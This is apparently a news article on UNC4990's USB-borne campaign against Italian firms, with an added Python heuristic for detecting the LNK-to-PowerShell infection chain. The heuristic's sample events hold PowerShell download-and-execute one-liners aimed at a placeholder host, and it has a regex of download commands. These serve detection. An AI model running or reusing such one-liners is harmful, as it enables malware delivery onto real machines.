UNC4990 uses weaponised USBs to attack Italian businesses

February 6, 2024

Italian businesses face a surge of cyber threats executed by the financially motivated threat group UNC4990.

Based on reports, the campaign uses weaponised USB devices that act as Trojan horses to infiltrate organisations across various Italian sectors, such as health, transportation, construction, and logistics.

The threat group’s strategy revolves around a two-pronged attack – widespread USB infection and subsequent deployment of the EMPTYSPACE downloader. In addition, UNC4990 leverages third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages of the malware. This sophisticated approach aims to bypass detection since these seemingly harmless platforms disguise the malicious activities.


UNC4990 has compromised Italian organisations since 2020.


UNC4990 has left a digital footprint pointing to a base of operations in Italy: since late 2020, the group has made extensive use of Italian infrastructure for command-and-control (C2) purposes.

The ultimate objectives of UNC4990 remain a mystery as researchers cannot definitively classify whether the group functions solely as an initial access facilitator for other threat actors or has an independent cybercriminal operation.

In one particular instance, an open-source cryptocurrency miner emerged following months of beaconing activity, adding a layer of complexity to UNC4990’s motives.

The infection begins when a victim unwittingly opens a malicious LNK shortcut file on a removable USB device. This triggers a PowerShell script that downloads EMPTYSPACE from a remote server.

A separate investigation identified four distinct variants of EMPTYSPACE, written in Golang, .NET, Node.js, and Python. These variants act as channels for fetching next-stage payloads from the C2 server, including a Python-based backdoor named QUIETBOARD.
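The infection chain described above (Explorer opening a shortcut from a removable drive, which launches PowerShell to fetch the downloader) is something a defender can look for in process-creation telemetry. The following detection heuristic is an added example written for this article, not code from any vendor report; the sample events and the set of removable drive letters are constructed.

```python
import re

# Constructed sample telemetry (not from the page or any real incident), shaped
# like process-creation events: parent image, child image, command line, cwd.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe", "cwd": "E:\\",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe", "cwd": "C:\\Users\\alice",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": 3, "parent": "cmd.exe", "image": "powershell.exe", "cwd": "C:\\Users\\alice",
     "cmdline": "powershell.exe -c Invoke-WebRequest http://intranet.example/report"},
    {"id": 4, "parent": "explorer.exe", "image": "notepad.exe", "cwd": "E:\\",
     "cmdline": "notepad.exe E:\\readme.txt"},
    {"id": 5, "parent": "explorer.exe", "image": "pwsh.exe", "cwd": "F:\\docs",
     "cmdline": "pwsh.exe -NoP -c \"iwr http://example.invalid/x -OutFile u.exe\""},
]

# Assumed drive letters the host reports as removable; a real deployment takes
# this from the endpoint's volume inventory rather than a fixed set.
REMOVABLE_DRIVES = {"E:", "F:"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Common ways a PowerShell one-liner fetches a further stage from a remote host.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)


def drive_of(path):
    """Return the drive letter prefix ('E:') of a Windows path, or '' if none."""
    return path[:2].upper() if len(path) >= 2 and path[1] == ":" else ""


def is_usb_lnk_powershell(ev, removable=REMOVABLE_DRIVES):
    """Explorer launched PowerShell with its working directory on a removable
    drive (what a shortcut opened from that drive yields) and the command line
    reaches out to download something: the chain the article describes."""
    return (
        ev["parent"].lower() == "explorer.exe"
        and ev["image"].lower() in POWERSHELL_IMAGES
        and drive_of(ev["cwd"]) in removable
        and DOWNLOAD_RE.search(ev["cmdline"]) is not None
    )


def flag_events(events, removable=REMOVABLE_DRIVES):
    """Return the ids of events matching the heuristic, in input order."""
    return [ev["id"] for ev in events if is_usb_lnk_powershell(ev, removable)]
```

Event 3 is deliberately not flagged even though it downloads: the parent is cmd.exe, not Explorer, so the working-directory and parent checks are what tie the alert to the USB shortcut scenario rather than to any PowerShell download.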

Fortunately, the content hosted on the platforms mentioned earlier posed no direct risk to regular users, as the malicious elements were isolated from the harmless content around them.

This modular approach showcases UNC4990’s inclination for experimentation and adaptability, employing multiple programming languages to create different versions of the EMPTYSPACE downloader and dynamically changing URLs to avoid takedowns.

As Italian businesses deal with this cyber threat, the UNC4990 campaign is a reminder that the attackers continue to evolve to execute a more sophisticated operation. Therefore, companies and users should know more about these threats to thwart such malicious campaigns.
